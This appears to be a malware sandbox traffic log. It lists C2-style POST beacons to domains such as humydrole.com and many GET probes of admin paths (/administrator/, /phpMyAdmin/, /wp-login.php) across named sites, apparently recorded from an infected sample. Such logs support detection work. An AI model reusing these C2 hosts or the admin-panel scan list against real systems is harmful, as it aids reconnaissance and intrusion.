Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hyxyetpogtskvpn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rupjnrdjpqmfylj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jhiybculfro.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: humydrole.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pkedugtuhtge.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://m7l.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipCookie: parking_session=7f46c281-0d45-430a-b10e-fda1cde88190User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ia.eu/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://san.ee/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipCookie: _dhc.139992723=222c8f6b-c030-4c0b-9d05-2464b2dacc4aUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipCookie: _dhc.651070=65f6761b-83f1-4927-9f54-1ecf80cdf74eUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://a6a.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://a6a.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.58; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ct.ated.net/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://san.ee/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://cm.cz/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://96l.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
